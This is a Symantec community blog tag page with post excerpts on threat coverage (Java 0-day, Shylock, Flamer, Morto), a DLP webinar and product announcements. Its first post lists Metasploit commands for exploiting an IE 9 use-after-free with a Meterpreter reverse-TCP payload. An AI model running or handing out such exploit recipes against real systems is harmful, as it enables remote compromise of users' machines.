Security Community Blog
Showing posts tagged with Symantec Protection Suites (SPS)
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
A vulnerability in IE 9 was discovered on 17/09/2012, which can be exploited with the following commands in Backtrack 5 R2:

Metasploit:

- msfupdate
- use exploit/windows/browser/ie_execcommand_uaf
- set SRVHOST 192.168 ...
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168 ...
- exploit

Let's beware the networking.

hugs

Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.
 

File-Based Protection (Traditional Antivirus)

Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
Brandon Noble | 23 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot more functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally, we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name as the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior for threats, as noted in this blog article from May 2012,...

Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version of last week's webinar, "Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention".

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the link to see the archived version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com to...

BJT | 04 Jun 2012 | 0 comments

At this time, Flamer seems to have targeted only a few hundred organizations and individuals located in a small segment of the globe. But make no mistake: Flamer is important worldwide. The complexity of the code within Flamer is on par with that seen in Stuxnet, arguably the most complex piece of malware Symantec has analyzed to date. However, the mission of Flamer is much different from that of Stuxnet, which was designed to deliver a payload that disrupted the systems it was targeted toward. Symantec and others' research indicates that Flamer, as of this moment, is purely focused on capture and exfiltration of sensitive information.
   
The good news for our public sector customers is that Symantec has protections in place to detect this threat (W32.Flamer). Specifically, we have:

  • AntiVirus, AntiSpyware, IPS component, Symantec Insight, and Heuristics detection and conviction measures in Symantec Protection Suite...
Beverly van de Velde | 29 Mar 2012 | 0 comments

Education Enablement Services is developing a Symantec Cloud Security Essentials course that combines the CSA training in order to achieve the CCSK credential & a Symantec Certified Professional (SCP) in Cloud Security credential. 

This is an open call for your experiences with reviewing, designing, or implementing security solutions in a cloud environment.  These could come from situations unique to the cloud (ex. compliance issues for systems in a public cloud) - OR - general security solutions addressed in cloud environments (ex. how existing encryption policies were applied to a cloud architecture). 

We need your:
• Specific examples of security solutions in cloud environments
• Example cloud architectures – good or bad – implemented by customers
• Key questions, challenges, and concerns from customers migrating their infrastructure to...

Brandon Noble | 01 Sep 2011 | 0 comments

Over the weekend, Microsoft and F-Secure issued warnings about a new global threat called “Morto”, and the Internet Storm Center has been seeing a large spike in traffic on port 3389.

The spike looks to have been caused by the RDP (Remote Desktop) portion of the worm calling around looking for RDP connections. Once it finds one, it uses a small list of weak passwords and... pwnage ensues.

Symantec detects this threat as W32.Morto, and Security Response will continue to perform deeper analysis throughout the next several days. So far, they have uncovered several dozen different MD5s that are all part of this same threat family.

 

Signs of Morto in your environment

As we learned with W32.Downadup:
Brute force attacks + Small list of passwords = Account lockouts.

As...

KatieBurton | 26 Aug 2011 | 0 comments

Bit9, the market leader in adaptive application whitelisting, has announced their integration with Symantec Protection Center, Symantec’s centralized security management console.

"To effectively mitigate security risks in their environment, our customers need visibility into proven third-party solutions like Bit9 Parity Suite. By providing single sign-on and data integration between our technologies, we are able to expand our customers' view into local security events and enable them to more quickly mitigate endpoint security risks," said Matthew Steele, Senior Director of Product Management at Symantec.

About Bit9 Parity Suite

Bit9's Parity Suite's adaptive application whitelisting solution protects organizations from modern cyber security threats. It accomplishes...

KatieBurton | 01 Aug 2011 | 9 comments

On Friday, July 29th, Symantec Protection Center 2.0 was released for General Availability. This release focused on extending the integrations found in our 1.0 release, third party products and the Symantec Global Intelligence Network to provide existing Symantec customers with relevant, actionable security intelligence. See below for an overview of the release and what our beta customers are saying! Protection Center is a free product, available at no additional charge for existing Symantec customers.

Response from Beta Customers

“One stop shop.. In my book it will empower my team.” – Fortune 500 financial services organization
“Install was easy, simply brilliant!” – European IT Value Added Reseller (VAR)
“Already plugging this to my clients, big time” – Enterprise IT Value Added Reseller (VAR)
“Will absolutely recommend to customers with integrated products” – Government IT...